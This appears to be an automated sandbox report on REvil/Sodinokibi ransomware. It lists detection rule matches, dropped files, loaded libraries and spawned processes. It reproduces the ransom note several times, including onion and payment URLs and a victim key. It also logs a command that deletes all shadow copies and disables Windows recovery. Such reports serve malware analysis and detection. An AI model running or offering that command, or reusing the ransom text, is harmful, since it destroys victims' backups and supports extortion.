            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Documents\ONBQCLYSPU\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Documents\SQRKHNBNYN\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\$WinREAgent\Scratch\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\Documents\WKXEWIOTXI\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\Default\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file
            Source: C:\Users\user\Desktop\myfile.exeFile dropped: C:\Users\user\g165067x37-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and install tor browser from this site: https://torproject.org/ b) open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/1a63b2fbdc0100612) if tor blocked in your country, try to use vpn! but you can use our secondary website. for this: a) open your any browser (chrome, firefox, opera, ie, edge) b) open our secondary website: http://decryptor.top/1a63b2fbdc010061warning: secondary website can be blocked, thats why first variant much better and more available.when you open our website, put the following data in the input form:key:vkofiliva4lyiaeeyh2h9vssv8as3lezrslkwaojtcwegvpk9g6k6yvmjJump to dropped file

            System Summary

            barindex
            Source: myfile.exe, type: SAMPLEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: myfile.exe, type: SAMPLEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: myfile.exe, type: SAMPLEMatched rule: REvil Payload Author: R3MRUM
            Source: myfile.exe, type: SAMPLEMatched rule: Win32_Ransomware_Revil Author: ReversingLabs
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: REvil Payload Author: R3MRUM
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Revil Author: ReversingLabs
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: REvil Payload Author: R3MRUM
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Revil Author: ReversingLabs
            Source: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: 00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies SODINOKIBI/REvil ransomware Author: unknown
            Source: C:\Users\user\Desktop\myfile.exeFile deleted: C:\Windows\WinSxS\Backup\amd64_hid-user.resources_31bf3856ad364e35_10.0.19041.1_en-gb_140ae2618f6740b3.manifestJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_0027A4BE0_2_0027A4BE
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002798290_2_00279829
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002778140_2_00277814
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002770930_2_00277093
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_002772F10_2_002772F1
            Source: myfile.exeStatic PE information: No import functions for PE file found
            Source: myfile.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: myfile.exe, type: SAMPLEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
            Source: myfile.exe, type: SAMPLEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
            Source: myfile.exe, type: SAMPLEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
            Source: myfile.exe, type: SAMPLEMatched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
            Source: 0.0.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_83f05fbe os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 8c32ca099c9117e394379c0cc4771a15e5e4cfb1a98210c288e743a6d9cc9967, id = 83f05fbe-65d1-423f-98df-21692167a1d6, last_modified = 2021-08-23
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: REvil author = R3MRUM, description = REvil Payload, cape_type = REvil Payload
            Source: 0.2.myfile.exe.270000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_Revil tc_detection_name = Revil, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
            Source: 00000000.00000002.2893815906.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
            Source: 00000000.00000000.1647049931.0000000000271000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Sodinokibi_a282ba44 os = windows, severity = x86, description = Identifies SODINOKIBI/REvil ransomware, creation_date = 2020-06-18, scan_context = file, memory, reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.revil, license = Elastic License v2, threat_name = Windows.Ransomware.Sodinokibi, fingerprint = 07f1feb22f8b9de0ebd5c4649545eb4823a274b49b2c61a44d3eed4739ecd572, id = a282ba44-b8bf-4fcc-a1c4-795675a928de, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@4/287@54/36
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00273F3C GetDriveTypeW,GetDiskFreeSpaceExW,0_2_00273F3C
            Source: C:\Users\user\Desktop\myfile.exeCode function: 0_2_00274668 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,0_2_00274668
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\program files\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\g165067x37-readme.txtJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
            Source: C:\Users\user\Desktop\myfile.exeMutant created: \Sessions\1\BaseNamedObjects\Global\206D87E0-0E60-DF25-DD8F-8E4E7D1E3BF0
            Source: C:\Users\user\Desktop\myfile.exeFile created: C:\Users\user\AppData\Local\Temp\p2fi4k6gh0.bmpJump to behavior
            Source: myfile.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\myfile.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: myfile.exeVirustotal: Detection: 90%
            Source: myfile.exeReversingLabs: Detection: 97%
            Source: unknownProcess created: C:\Users\user\Desktop\myfile.exe "C:\Users\user\Desktop\myfile.exe"
            Source: C:\Users\user\Desktop\myfile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\myfile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: drprov.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ntlanman.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: davclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: davhlpr.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: browcli.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\myfile.exeDirectory created: c:\program files\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeDirectory created: c:\program files\8c3ea92d.lockJump to behavior
            Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\~ source: myfile.exe, 00000000.00000003.2024747087.0000000004343000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \\?\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: myfile.exe, 00000000.00000003.2018769602.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2024670998.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp, myfile.exe, 00000000.00000003.2020421518.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp
            Source: myfile.exeStatic PE information: section name: .s7bz

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\Desktop\myfile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures
            Source: C:\Users\user\Desktop\myfile.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailuresJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: C:\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\$winreagent\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\program files\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\program files (x86)\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\recovery\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\$winreagent\scratch\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\public\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\favorites\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\onedrive\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\saved games\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\default\videos\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\.ms-ad\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\3d objects\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\contacts\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\desktop\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\documents\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\downloads\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\favorites\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\links\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\music\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\onedrive\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\pictures\g165067x37-readme.txtJump to behavior
            Source: C:\Users\user\Desktop\myfile.exeFile created: c:\users\user\recent\g165067x37-readme.txtJump to behavior
